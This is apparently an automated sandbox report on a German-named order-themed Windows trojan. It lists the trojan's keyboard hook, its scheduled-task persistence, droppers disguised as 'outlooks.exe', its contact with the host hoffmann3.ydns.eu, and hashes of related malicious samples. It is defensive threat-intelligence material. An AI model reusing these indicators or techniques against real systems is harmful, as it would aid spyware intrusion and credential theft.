66 schtasks.exe 39->66         started        68 conhost.exe 42->68         started        process12 dnsIp13 96 hoffmann3.ydns.eu 193.34.212.17, 49713, 5829 PL-SKYTECH-ASPL Poland 58->96 98 ipwho.is 103.126.138.87, 443, 49716 AS40676US United States 58->98 120 Hides that the sample has been downloaded from the Internet (zone.identifier) 58->120 122 Installs a global keyboard hook 58->122 70 schtasks.exe 58->70         started        124 Loading BitLocker PowerShell Module 62->124 72 conhost.exe 62->72         started        74 conhost.exe 64->74         started        76 conhost.exe 66->76         started        signatures14 process15 process16 78 conhost.exe 70->78         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Bestellung - 021224 - 901003637.exe47%ReversingLabsWin32.Trojan.Nekark
                Bestellung - 021224 - 901003637.exe100%AviraHEUR/AGEN.1357257
                Bestellung - 021224 - 901003637.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe100%AviraHEUR/AGEN.1357257
                C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe100%AviraHEUR/AGEN.1357257
                C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe47%ReversingLabsWin32.Trojan.Nekark
                C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe47%ReversingLabsWin32.Trojan.Nekark

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                hoffmann3.ydns.eu100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.214.172
                		truefalse
                  		high
                  hoffmann3.ydns.eu
                  		193.34.212.17
                  		truetrue
                    		unknown
                    ipwho.is
                    		103.126.138.87
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      hoffmann3.ydns.eutrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://ipwho.is/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.datacontract.org/2004/07/doutlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/14436606/23354Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.datacontract.org/2004/07/outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ipwho.isdoutlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://ipwho.isoutlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://localhost/arkanoid_server/requests.phpoutlooks.exe, 0000000F.00000002.1685100686.00000000033B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/2152978/23354sCannotBestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1499776253.0000000003191000.00000004.00000800.00020000.00000000.sdmp, eNuXmIwkixzW.exe, 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000F.00000002.1685100686.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.drfalse
                                              		high
                                              http://ipwho.isoutlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.microsoft.outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  193.34.212.17
                                                  		hoffmann3.ydns.euPoland
                                                  		201814PL-SKYTECH-ASPLtrue
                                                  103.126.138.87
                                                  		ipwho.isUnited States
                                                  		40676AS40676USfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1567415
                                                  Start date and time:2024-12-03 14:52:39 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 11m 12s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:39
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Bestellung - 021224 - 901003637.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@49/37@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 97%
                                                  • Number of executed functions: 184
                                                  • Number of non-executed functions: 19
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: Bestellung - 021224 - 901003637.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:53:34API Interceptor1x Sleep call for process: Bestellung - 021224 - 901003637.exe modified
                                                  08:53:37API Interceptor138x Sleep call for process: powershell.exe modified
                                                  08:53:42API Interceptor9970715x Sleep call for process: outlooks.exe modified
                                                  08:53:52API Interceptor1x Sleep call for process: eNuXmIwkixzW.exe modified
                                                  14:53:39Task SchedulerRun new task: eNuXmIwkixzW path: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                  14:53:41Task SchedulerRun new task: Outlooks path: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  193.34.212.17Zam.exeGet hashmaliciousDiscord Token Stealer, PureLog StealerBrowse
                                                    KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                      103.126.138.87https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                        Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                          Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                            https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                              Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                                  http://www.urbanerecycling.comGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                    0Nj1sxmCtr.exeGet hashmaliciousBinder HackTool, QuasarBrowse
                                                                      https://doam29-kk5ug.ondigitalocean.app/Get hashmaliciousTechSupportScamBrowse
                                                                        https://tronblma3sw.z13.web.core.windows.net/?click_id=2isqs9om0m3rjybj2&tid=903&subid=novatechwheels.com&ref=novatechwheels.com&922%5DGet hashmaliciousTechSupportScamBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ipwho.ishttp://www.urbanerecycling.comGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                          • 103.126.138.87
                                                                          0Nj1sxmCtr.exeGet hashmaliciousBinder HackTool, QuasarBrowse
                                                                          • 103.126.138.87
                                                                          https://doam29-kk5ug.ondigitalocean.app/Get hashmaliciousTechSupportScamBrowse
                                                                          • 103.126.138.87
                                                                          https://tronblma3sw.z13.web.core.windows.net/?click_id=2isqs9om0m3rjybj2&tid=903&subid=novatechwheels.com&ref=novatechwheels.com&922%5DGet hashmaliciousTechSupportScamBrowse
                                                                          • 103.126.138.87
                                                                          KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                                          • 103.126.138.87
                                                                          ________.exeGet hashmaliciousQuasarBrowse
                                                                          • 195.201.57.90
                                                                          Zam#U00f3wienie 89118 _ Metal-Constructions.pdf.com.exeGet hashmaliciousQuasarBrowse
                                                                          • 195.201.57.90
                                                                          Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                          • 195.201.57.90
                                                                          1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                          • 195.201.57.90
                                                                          https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html#Get hashmaliciousTechSupportScamBrowse
                                                                          • 195.201.57.90
                                                                          bg.microsoft.map.fastly.netJEM PLATBY.exeGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          KvG1NAXkgp9PxQb.exeGet hashmaliciousFormBookBrowse
                                                                          • 199.232.214.172
                                                                          Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                          • 199.232.214.172
                                                                          phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          001.xlsGet hashmaliciousGet2DownloaderBrowse
                                                                          • 199.232.214.172
                                                                          442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                          • 199.232.214.172
                                                                          27112024_0154_new.batGet hashmaliciousUnknownBrowse
                                                                          • 199.232.210.172
                                                                          I_ katya_gianotti@cuzziol_it password scadr#U00e0 oggi!.msgGet hashmaliciousUnknownBrowse
                                                                          • 199.232.214.172
                                                                          hoffmann3.ydns.euAuftragsbest#U00e4tigung 20241107_pdf.com.exeGet hashmaliciousQuasarBrowse
                                                                          • 125.0.0.1
                                                                          Bestellung - 20240001833.com.exeGet hashmaliciousQuasarBrowse
                                                                          • 125.0.0.1

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          PL-SKYTECH-ASPLZam.exeGet hashmaliciousDiscord Token Stealer, PureLog StealerBrowse
                                                                          • 193.34.212.17
                                                                          KRcLFIz5PCQunB7.exeGet hashmaliciousQuasarBrowse
                                                                          • 193.34.212.17
                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                          • 91.223.3.164
                                                                          Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                          • 95.214.53.96
                                                                          4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                          • 193.34.212.14
                                                                          4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                                                          • 193.34.212.14
                                                                          SH20240622902.scr.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                          • 193.34.212.15
                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          mpslbot.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          mipsbot.elfGet hashmaliciousUnknownBrowse
                                                                          • 95.214.52.167
                                                                          AS40676UShttps://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                          • 103.126.138.87
                                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                          • 103.126.138.87
                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 107.169.202.161
                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 23.91.0.144
                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 107.176.168.239
                                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                          • 107.177.38.11
                                                                          sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 104.244.155.34
                                                                          Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                                          • 103.126.138.87
                                                                          https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                          • 103.126.138.87
                                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                          • 103.126.138.87

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 103.126.138.87
                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 103.126.138.87
                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                          • 103.126.138.87
                                                                          https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                          • 103.126.138.87
                                                                          kjsdhf243kj2.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                          • 103.126.138.87
                                                                          kjsdfhsdHndf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                          • 103.126.138.87
                                                                          hkjsdhf01.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                          • 103.126.138.87
                                                                          kjshdfj_ksdf02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                          • 103.126.138.87
                                                                          sjadhfkjshd0de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                          • 103.126.138.87

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):71954
                                                                          Entropy (8bit):7.996617769952133
                                                                          Encrypted:true
                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                          Malicious:false
                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.244101792565376
                                                                          Encrypted:false
                                                                          SSDEEP:6:kK9NF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VNsDImsLNkPlE99SNxAhUe/3
                                                                          MD5:46273F90B0C41E0F605DF4CAF0B6C3D1
                                                                          SHA1:D2B606CFA8FAE774B3AC7915F273A3B7DD3FCB72
                                                                          SHA-256:BDA713D577F2E1D88266B601FDABBAB48555CD43E078E8E1B4A3FEBA56F38D08
                                                                          SHA-512:B84572B4FA556F211267A23453BB75228532EAE46002BEA1BD29AD3B4459E7A53E379E57043BFE6E787F3FA4F95E549CE44FF31A69C268A4FA0CF6BF15E01077
                                                                          Malicious:false
                                                                          Preview:p...... .........5b..E..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bestellung - 021224 - 901003637.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:true
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eNuXmIwkixzW.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\outlooks.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):2232
                                                                          Entropy (8bit):5.380632238223751
                                                                          Encrypted:false
